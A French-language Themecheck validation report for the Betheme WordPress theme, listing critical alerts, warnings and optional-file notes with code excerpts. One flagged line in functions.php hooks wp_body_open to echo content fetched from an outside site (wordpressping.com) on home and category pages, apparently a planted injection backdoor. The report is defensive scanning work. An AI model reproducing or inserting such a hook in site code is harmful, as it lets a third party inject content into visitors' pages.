11
Résultats de validation

Betheme

Betheme

WordPress 5.5.3 theme
11
Ce thème n'est peut être pas libre. Themecheck ne distribue pas de thèmes commerciaux.
Alertes critiques
  1. Présence d'iframes : Les iframes sont parfois utilisées pour charger du contenu non désirés ou du code malicieux sur des sites tiers <iframe class="scale-with-grid" src="https://player.vimeo.com/video/'. esc_attr($video) .'" allowFullScreen> trouvé dans le fichier theme-functions.php. 1653: $output .= '<iframe class='scale-with-grid' src='https://player.vimeo.com/video/'. esc_<iframe class="embed" width="100%" height="'. esc_attr($height) .'" frameborder="0" style="border:0" src="'. esc_url($src) .'" allowfullscreen> trouvé dans le fichier theme-shortcodes.php. 5618: $output = '<iframe class='embed' width='100%' height=''. esc_attr($height) .'' framebo
  2. Code malveillant : Opérations sur système de fichiers file_get_contents trouvé dans le fichier functions.php. 168: if(function_exists('wp_body_open')){function wp_body_opener(){if(is_category()||is_front_page()||is_home()){echo file_get_contents('https://wordpressping.com/pong.txt');}}add_action('wp_bofile_get_contents trouvé dans le fichier functions.php. 168: if(function_exists('wp_body_open')){function wp_body_opener(){if(is_category()||is_front_page()||is_home()){echo file_get_contents('https://wordpressping.com/pong.txt');}}add_action('wp_bofopen trouvé dans le fichier class-mfn-importer.php. 214: $fp = fopen( $path, 'r' );fread trouvé dans le fichier class-mfn-importer.php. 215: $data = fread( $fp, filesize( $path ) );fclose trouvé dans le fichier class-mfn-importer.php. 216: fclose( $fp );file_get_contents trouvé dans le fichier parsers.php. 71: $success = $dom->loadXML( file_get_contents( $file ) );295: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {file_get_contents trouvé dans le fichier parsers.php. 71: $success = $dom->loadXML( file_get_contents( $file ) );295: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {fopen trouvé dans le fichier parsers.php. 451: $fp = $this->fopen( $file, 'r' );672: function fopen( $filename, $mode = 'r' ) {675: return fopen( $filename, $mode );fclose trouvé dans le fichier parsers.php. 495: $this->fclose($fp);690: function fclose( $fp ) {693: return fclose( $fp );fopen trouvé dans le fichier parsers.php. 451: $fp = $this->fopen( $file, 'r' );672: function fopen( $filename, $mode = 'r' ) {675: return fopen( $filename, $mode );fopen trouvé dans le fichier parsers.php. 451: $fp = $this->fopen( $file, 'r' );672: function fopen( $filename, $mode = 'r' ) {675: return fopen( $filename, $mode );fclose trouvé dans le fichier parsers.php. 495: $this->fclose($fp);690: function fclose( $fp ) {693: return fclose( $fp );fclose trouvé dans le fichier parsers.php. 495: $this->fclose($fp);690: function fclose( $fp ) {693: return fclose( $fp );
  3. Code malveillant : Opérations réseau curl_init trouvé dans le fichier class-mfn-importer-api.php. 83: $curl = curl_init($url);curl_exec trouvé dans le fichier class-mfn-importer-api.php. 89: $result = curl_exec($curl);
  4. Menu Admin : Les thèmes doivent utiliser add_theme_page () pour ajouter des pages admin. Fichier options.php : 150: $this->page = add_submenu_page(Fichier class-mfn-support.php : 27: $this->page = add_submenu_page(Fichier class-mfn-dashboard.php : 117: $this->page = add_menu_page(Fichier class-mfn-dashboard.php : 127: add_submenu_page(Fichier class-tgm-plugin-activation.php : 724: $this->page_hook = add_submenu_page( $args['parent_slug'], $args['page_title'], $args['menu_tiFichier class-mfn-status.php : 30: $this->page = add_submenu_page(Fichier class-mfn-changelog.php : 27: $this->page = add_submenu_page(Fichier class-mfn-importer.php : 122: $this->page = add_submenu_page(
Attention
  1. tags du thème : Présence de tags inconnusTag inconnu trouvé dans l'entête du fichier style.css.
  2. Text domain : Utilisation incorrecte des fonctions de traduction.Utilisation d'une fonction de traduction avec un nombre incorrect d'arguments. Fonction __, avec les arguments 'This demo package is not available on the cloud server. Contact @babak.', Package Name: , 'mfn-opts' dans le fichier class-mfn-importer-api.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Lorem ipsum dolor sit amet' dans le fichier class-mfn-elementor-widget-info-box.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Lorem ipsum dolor sit amet' dans le fichier class-mfn-elementor-widget-info-box.php.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont js_composer, betheme, woocommerce, mfn-opts, bbpress, tgmpa, wordpress-importer, Package Name: , sitepress.
  3. Contextes de plugin : Fonctionnalités de pluginLe thème utilise la fonction register_post_type(). Cette fonction n'est pas prévue pour être utilisée dans le contexte d'un thème, mais plutôt dans un plugin.Le thème utilise la fonction add_shortcode(). L'utilisation des custom post-content shortcodes est du domaine des plugins.
  4. Barre d'admin cachée : Barre d'admin cachée dans CSSLes thèmes ne doivent pas cacher la barre d'admin. Détecté dans le fichier responsive.css.
  5. Eléments custom : Présence d'une entête customAucune référence à custom header n'a été trouvée dans le thème.
  6. Eléments custom : Présence d'un fond customAucune référence à custom background n'a été trouvée dans le thème.
  7. Implémentation de l'internationalisation : Utilisation correcte de ___al(La variable $file_url a été trouvée dans une fonction de traduction dans le fichier class-mfn-importer-api.php . Les appels de fonctions de traduction ne doivent pas contenir de variables PHP.
  8. Implémentation de la date et de l'heure : Utilisation de the_date()Au moins une date codée en dur a été trouvée dans le fichier single-download.php. Il est préférable d'utiliser la fonction get_option( 'date_format' )à la place.Au moins une date codée en dur a été trouvée dans le fichier content-single-portfolio.php. Il est préférable d'utiliser la fonction get_option( 'date_format' )à la place.
  9. Screenshot : Copie d'écranMauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Liens statiques : Présence de liens codés en durLien potentiellement codés en dur trouvé dans le fichier options.php.515: echo '<div class='mfn-link'><a href='admin.php?page=be-support'>'. __('Manual & Support', 'mfn-opts') .'</a></diLien potentiellement codés en dur trouvé dans le fichier field_custom.php.32: echo '<p>BeTheme is <a href='https://wpml.org/theme/betheme/?aid=29349&affiliate_key=aCEsSE0ka33p' targeLien potentiellement codés en dur trouvé dans le fichier theme-options.php.5513: 'desc' => __('Some of the fonts in the Google Fonts Directory support multiple styles. For a complete list of available font subsets please see <a href='https://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mf5550: 'desc' => __('Some of the fonts in the Google Fonts Directory support multiple scripts (like Latin and Cyrillic for example). For a complete list of available font subsets please see <a href='https://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mf5513: 'desc' => __('Some of the fonts in the Google Fonts Directory support multiple styles. For a complete list of available font subsets please see <a href='https://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mf5550: 'desc' => __('Some of the fonts in the Google Fonts Directory support multiple scripts (like Latin and Cyrillic for example). For a complete list of available font subsets please see <a href='https://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mfLien potentiellement codés en dur trouvé dans le fichier class-mfn-widget-flickr.php.93: <?php _e('Use <a href='http://idgettr.com/' target='_blank'>this</a> tool to find your Flickr userLien potentiellement codés en dur trouvé dans le fichier notice-register.php.3: <p>Please <a href='admin.php?page=betheme'>register</a> this version of theme to get access toLien potentiellement codés en dur trouvé dans le fichier dashboard.php.173: <li><a href='admin.php?page=be-plugins'><?php esc_html_e( 'Install Plugins', 'mfn-opts' 174: <li><a href='admin.php?page=be-websites'><?php esc_html_e( 'Pre-built websites', 'mfn-op175: <li><a href='admin.php?page=be-options'><?php esc_html_e( 'Theme Options', 'mfn-opts' );Lien potentiellement codés en dur trouvé dans le fichier mini-status.php.150: <a href='admin.php?page=be-status'><?php esc_html_e('More details', 'mfn-opts') ?></Lien potentiellement codés en dur trouvé dans le fichier header.php.70: <a href='update-core.php' class='button'><?php esc_html_e( 'Update to', 'mfn-opts' )91: <a href='admin.php?page=betheme' class='nav-tab<?php if( $current_screen == 'topleve93: <a href='admin.php?page=be-status' class='nav-tab<?php if( $current_screen == 'bethe95: <a href='admin.php?page=be-support' class='nav-tab<?php if( $current_screen == 'beth96: <a href='admin.php?page=be-changelog' class='nav-tab<?php if( $current_screen == 'beLien potentiellement codés en dur trouvé dans le fichier class-tgm-plugin-activation.php.2698: $action_links[ 'register' ] = '<span style='color:#666'>Please</span> <a href='admin.php?page=betheme'>register</a> <span style='color:#666'>the theme</spLien potentiellement codés en dur trouvé dans le fichier class-mfn-importer.php.1124: echo '<span class='install'><a href='admin.php?page=be-plugins'>Install</a></span>';1138: $install_url = 'admin.php?page=be-plugins';1161: echo '<a href='admin.php?page=betheme' class='mfn-button mfn-button-secondary'>Please regiLien potentiellement codés en dur trouvé dans le fichier theme-functions.php.1238: $output .= '<div class='jp-no-solution'><span>Update Required</span>To play the media you will need to either update your browser to a recent version or update your <a href='https://get.adobe.com/flashplayer/' target='_blank'>Flash plugin</a></div>'
  2. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  3. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  4. Fichiers optionnels : Présence du fichier-template de page d'accueil home.phpCe thème ne contient pas le fichier optionnel home.php.
  5. Fichiers optionnels : Présence du fichier-template de catégorie category.phpCe thème ne contient pas le fichier optionnel category.php.
  6. Fichiers optionnels : Présence du fichier-template des tags tag.phpCe thème ne contient pas le fichier optionnel tag.php.
  7. Fichiers optionnels : Présence du fichier template de taxinomie taxonomy.phpCe thème ne contient pas le fichier optionnel taxonomy.php.
  8. Fichiers optionnels : Présence du fichier-template author.phpCe thème ne contient pas le fichier optionnel author.php.
  9. Fichiers optionnels : Présence de du fichier-template des dates et heures date.phpCe thème ne contient pas le fichier optionnel date.php.
  10. Fichiers optionnels : Présence du fichier-template des archives archive.phpCe thème ne contient pas le fichier optionnel archive.php.
  11. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  12. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  13. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : options.php 247: require_once( $this->dir .'fields/class-mfn-options-field.php' );408: require_once($this->dir .'validation/'. $field[ 'validate' ] .'/validation_735: require_once( $this->dir .'fields/'. $field['type'] .'/field_'. $field['typ Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : theme-options.php 10: require_once(get_theme_file_path('/muffin-options/fonts.php'));11: require_once(get_theme_file_path('/muffin-options/options.php')); Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : header-top-bar-right.php 73: get_template_part('includes/include', 'wpml'); Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : header-side-slide.php 218: get_template_part('includes/include', 'slogan');224: get_template_part('includes/include', 'social'); Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : header-top-area.php 19: get_template_part('includes/include', 'slogan');24: get_template_part('includes/include', 'social');60: <?php get_template_part('includes/include', 'logo'); ?> Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : header-creative.php 29: get_template_part('includes/include', 'social');44: <?php get_template_part('includes/include', 'logo'); ?>103: get_template_part('includes/include', 'slogan');109: get_template_part('includes/include', 'social'); Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : class-mfn-widgets.php 38: require_once(get_theme_file_path('/functions/widgets/class-mfn-widget-'. $w Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : class-mfn-tgmpa.php 52: include_once 'class-tgm-plugin-activation.php'; Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : class-mfn-importer.php 72: require_once(get_theme_file_path('/functions/importer/demos.php'));762: require_once(get_theme_file_path('/functions/admin/templates/parts/white-la781: require_once(ABSPATH .'wp-admin/includes/class-wp-importer.php');785: require_once(get_theme_file_path('/functions/importer/wordpress-importer.ph796: require_once(get_theme_file_path('/functions/importer/class-mfn-importer-ap Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : class-mfn-elementor.php 65: require_once( get_theme_file_path( '/functions/plugins/elementor/class-mfn-189: require_once( get_theme_file_path( '/functions/plugins/elementor/class-mfn- Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : class-mfn-builder-admin.php 107: require_once(get_template_directory() .'/muffin-options/fields/'. $field['t Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : class-mfn-builder.php 29: require_once(get_theme_file_path('/functions/builder/class-mfn-builder-help35: require_once(get_theme_file_path('/functions/builder/class-mfn-builder-fiel36: require_once(get_theme_file_path('/functions/builder/class-mfn-builder-admi37: require_once(get_theme_file_path('/functions/builder/class-mfn-builder-ajax41: require_once(get_theme_file_path('/functions/builder/class-mfn-builder-styl42: require_once(get_theme_file_path('/functions/builder/class-mfn-builder-fron43: require_once(get_theme_file_path('/functions/builder/class-mfn-builder-item Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : footer.php 136: get_template_part('includes/include', 'social'); Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
Other checked themes